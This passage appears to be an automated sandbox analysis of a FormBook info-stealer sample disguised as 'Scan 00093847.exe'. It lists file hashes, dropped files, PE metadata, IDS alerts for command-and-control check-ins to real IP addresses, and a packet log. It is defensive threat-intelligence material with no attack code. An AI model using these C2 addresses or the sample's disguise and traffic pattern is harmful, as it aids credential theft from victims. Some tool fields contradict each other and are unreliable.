                                          15:43:56 | API Interceptor | 6231395x Sleep call for process: setupugc.exe modified
                                          Process: C:\Users\user\Desktop\Scan 00093847.exe
                                          File Type: ASCII text, with CRLF line terminators
                                          Category: dropped
                                          Size (bytes): 1216
                                          Entropy (8bit): 5.34331486778365
                                          Encrypted: false
                                          SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5: 1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious: true
                                          Reputation: high, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1172
                                          Entropy (8bit):5.340856735080657
                                          Encrypted:false
                                          SSDEEP:24:3MWSKco4KmBs4RP8jKbmC6moUebIKo+mZ9t7J0gt/NKIl9r+q:8WSU4y4RYymaoUeW+mZ9tK8ND3
                                          MD5:127FA3C1E54F5A8BCBB70A3F3DD5A6F8
                                          SHA1:D4CF69F781047FB97E0BAC7D7F2C1ADB1FA9381A
                                          SHA-256:6B05148F8A15293F166CA5926E3222253F75511A29B28C48F5569A3D942098EB
                                          SHA-512:9D817D663A2DCAFE03AD8331B39674D92DB74C6421BB812F7CC1BD2FF079462C8D4A4ED1F0FF4247D4DEAA85CF580AA597709AD58EB1E10C740697468077565C
                                          Malicious:false
                                          Reputation:low
                                          Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                          Process:C:\Windows\SysWOW64\setupugc.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.906182803463929
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Scan 00093847.exe
                                          File size:798'720 bytes
                                          MD5:7c580b0bf94b5edb15717136670a8092
                                          SHA1:92393d585cfc170824a8184e68d2724a42b68835
                                          SHA256:9d606ced77696b89acfe57d52547936b3b36f8bce44fbde3efa787e693f82637
                                          SHA512:7e28c353365cfaa7b705e67ed4ef61689301c98c9b28af9353b853fc3801109e5124bc1d0c580b486af2157a7ad5cfe5e314c75079e4e55bf09bccdd9aeb72d4
                                          SSDEEP:24576:KUobyD4+OlsfgTEoFMeDcvypD2hOLYAwpM8f:rh4tip6n8OLYX
                                          TLSH:790512103768CB2BD9AD8AFA54B5A1014379EE674203FB085F9134EA1E73BD30595F8B
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=................0..&..........f8... ...`....@.. ....................................@................................
                                          Icon Hash:90cececece8e8eb0
                                          Entrypoint:0x4c3866
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x97CE3D1D [Thu Sep 15 17:27:57 2050 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Instruction
                                          jmp dword ptr [00402000h]
                                          loop 00007F7300521B31h
                                          Name | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc3811 | 0x4f | .text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc6000 | 0x5ac | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc8000 | 0xc | .reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0xbd860 | 0x70 | .text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                          .text | 0x2000 | 0xc2464 | 0xc2600 | fd0181527ad07faea58bfe59d327b47f | False | 0.931572799437299 | data | 7.912332332178285 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc | 0xc6000 | 0x5ac | 0x600 | 40b6773b22027034c5402bd0cebe6914 | False | 0.4212239583333333 | data | 4.1155869895173245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc | 0xc8000 | 0xc | 0x200 | 604cd57352415c705127d856749ca575 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                          RT_VERSION | 0xc6090 | 0x31c | data | | | 0.435929648241206
                                          RT_MANIFEST | 0xc63bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                          DLL | Import
                                          mscoree.dll | _CorExeMain
                                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                          2024-09-07T21:43:36.228581+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 56228 | 82.221.128.183 | 80 | TCP
                                          2024-09-07T21:44:00.021494+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56230 | 217.160.0.127 | 80 | TCP
                                          2024-09-07T21:44:02.597060+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56231 | 217.160.0.127 | 80 | TCP
                                          2024-09-07T21:44:05.121163+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56232 | 217.160.0.127 | 80 | TCP
                                          2024-09-07T21:44:07.694615+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 56233 | 217.160.0.127 | 80 | TCP
                                          2024-09-07T21:44:13.635184+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56234 | 85.159.66.93 | 80 | TCP
                                          2024-09-07T21:44:16.178192+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56235 | 85.159.66.93 | 80 | TCP
                                          2024-09-07T21:44:18.855613+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56236 | 85.159.66.93 | 80 | TCP
                                          2024-09-07T21:44:21.251583+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 56237 | 85.159.66.93 | 80 | TCP
                                          2024-09-07T21:44:27.653098+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56238 | 18.139.62.226 | 80 | TCP
                                          2024-09-07T21:44:30.171638+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56239 | 18.139.62.226 | 80 | TCP
                                          2024-09-07T21:44:32.745379+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56240 | 18.139.62.226 | 80 | TCP
                                          2024-09-07T21:44:35.274281+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 56241 | 18.139.62.226 | 80 | TCP
                                          2024-09-07T21:44:41.381314+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56242 | 162.0.213.94 | 80 | TCP
                                          2024-09-07T21:44:43.921266+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56243 | 162.0.213.94 | 80 | TCP
                                          2024-09-07T21:44:46.507584+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56244 | 162.0.213.94 | 80 | TCP
                                          2024-09-07T21:44:49.014006+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 56245 | 162.0.213.94 | 80 | TCP
                                          2024-09-07T21:44:55.044638+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56246 | 3.33.130.190 | 80 | TCP
                                          2024-09-07T21:44:57.590729+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56247 | 3.33.130.190 | 80 | TCP
                                          2024-09-07T21:45:00.152606+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56248 | 3.33.130.190 | 80 | TCP
                                          2024-09-07T21:45:02.701525+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 56249 | 3.33.130.190 | 80 | TCP
                                          2024-09-07T21:45:08.215628+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56250 | 13.248.169.48 | 80 | TCP
                                          2024-09-07T21:45:11.261505+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56251 | 13.248.169.48 | 80 | TCP
                                          2024-09-07T21:45:14.263668+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56252 | 13.248.169.48 | 80 | TCP
                                          2024-09-07T21:45:16.809766+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 56253 | 13.248.169.48 | 80 | TCP
                                          2024-09-07T21:45:23.571419+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56254 | 185.134.245.113 | 80 | TCP
                                          2024-09-07T21:45:26.061528+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56255 | 185.134.245.113 | 80 | TCP
                                          2024-09-07T21:45:28.592743+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56256 | 185.134.245.113 | 80 | TCP
                                          2024-09-07T21:45:31.255864+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 56257 | 185.134.245.113 | 80 | TCP
                                          2024-09-07T21:45:37.497476+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56258 | 103.42.108.46 | 80 | TCP
                                          2024-09-07T21:45:40.787323+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56259 | 103.42.108.46 | 80 | TCP
                                          2024-09-07T21:45:43.323564+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56260 | 103.42.108.46 | 80 | TCP
                                          2024-09-07T21:45:45.914448+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 56261 | 103.42.108.46 | 80 | TCP
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Sep 7, 2024 21:44:21.251424074 CEST805623785.159.66.93192.168.2.4
                                          Sep 7, 2024 21:44:21.251509905 CEST805623785.159.66.93192.168.2.4
                                          Sep 7, 2024 21:44:21.251583099 CEST5623780192.168.2.485.159.66.93
                                          Sep 7, 2024 21:44:21.254203081 CEST5623780192.168.2.485.159.66.93
                                          Sep 7, 2024 21:44:21.259006023 CEST805623785.159.66.93192.168.2.4
                                          Sep 7, 2024 21:44:26.707937956 CEST5623880192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:26.712794065 CEST805623818.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:26.712904930 CEST5623880192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:26.722345114 CEST5623880192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:26.728601933 CEST805623818.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:27.652952909 CEST805623818.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:27.653036118 CEST805623818.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:27.653098106 CEST5623880192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:28.238790035 CEST5623880192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:29.259008884 CEST5623980192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:29.265922070 CEST805623918.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:29.266283035 CEST5623980192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:29.276223898 CEST5623980192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:29.281790018 CEST805623918.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:30.171544075 CEST805623918.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:30.171592951 CEST805623918.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:30.171638012 CEST5623980192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:30.785705090 CEST5623980192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:31.807476997 CEST5624080192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:31.812505960 CEST805624018.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:31.812642097 CEST5624080192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:31.824115992 CEST5624080192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:31.829050064 CEST805624018.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:31.829061031 CEST805624018.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:31.829070091 CEST805624018.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:31.829116106 CEST805624018.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:31.829124928 CEST805624018.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:31.829168081 CEST805624018.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:31.829221010 CEST805624018.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:31.829232931 CEST805624018.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:31.829253912 CEST805624018.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:32.744940996 CEST805624018.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:32.745198965 CEST805624018.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:32.745378971 CEST5624080192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:33.335958958 CEST5624080192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:34.352019072 CEST5624180192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:34.357064009 CEST805624118.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:34.357145071 CEST5624180192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:34.367403030 CEST5624180192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:34.373289108 CEST805624118.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:35.273915052 CEST805624118.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:35.274050951 CEST805624118.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:35.274281025 CEST5624180192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:35.277393103 CEST5624180192.168.2.418.139.62.226
                                          Sep 7, 2024 21:44:35.284059048 CEST805624118.139.62.226192.168.2.4
                                          Sep 7, 2024 21:44:40.743181944 CEST5624280192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:40.748219967 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:40.748301983 CEST5624280192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:40.758582115 CEST5624280192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:40.763394117 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.380681038 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.380717993 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.380731106 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.381172895 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.381184101 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.381194115 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.381314039 CEST5624280192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:41.381314039 CEST5624280192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:41.382145882 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.382157087 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.382165909 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.383023977 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.385351896 CEST5624280192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:41.387025118 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.387597084 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.393362999 CEST5624280192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:41.473025084 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.473156929 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.473170996 CEST8056242162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:41.473504066 CEST5624280192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:42.270036936 CEST5624280192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:43.288781881 CEST5624380192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:43.294500113 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.294586897 CEST5624380192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:43.305522919 CEST5624380192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:43.310465097 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.920993090 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.921118975 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.921130896 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.921266079 CEST5624380192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:43.921649933 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.921677113 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.921689034 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.921924114 CEST5624380192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:43.922636986 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.922647953 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.922657967 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.922715902 CEST5624380192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:43.923490047 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.923654079 CEST5624380192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:43.927473068 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.927623987 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.927634001 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:43.927735090 CEST5624380192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:44.013557911 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:44.013901949 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:44.013916016 CEST8056243162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:44.014033079 CEST5624380192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:44.817152977 CEST5624380192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:45.836369991 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:45.841265917 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:45.845480919 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:45.869394064 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:45.874332905 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:45.874346972 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:45.874356031 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:45.874373913 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:45.874382019 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:45.874428988 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:45.874521971 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:45.874530077 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:45.874547958 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.507515907 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.507540941 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.507555008 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.507584095 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:46.508029938 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.508044004 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.508055925 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.508063078 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:46.508065939 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.508095980 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:46.508964062 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.508980989 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.508991003 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.509001017 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:46.509025097 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:46.512506008 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.512600899 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.512625933 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.512636900 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:46.512959957 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.512995958 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:46.594142914 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.594332933 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.594347000 CEST8056244162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:46.594383001 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:46.594409943 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:47.379499912 CEST5624480192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:48.398643017 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:48.403681040 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:48.403743982 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:48.412349939 CEST5624580192.168.2.4162.0.213.94
                                          Sep 7, 2024 21:44:48.417239904 CEST8056245162.0.213.94192.168.2.4
                                          Sep 7, 2024 21:44:49.013868093 CEST8056245162.0.213.94192.168.2.4
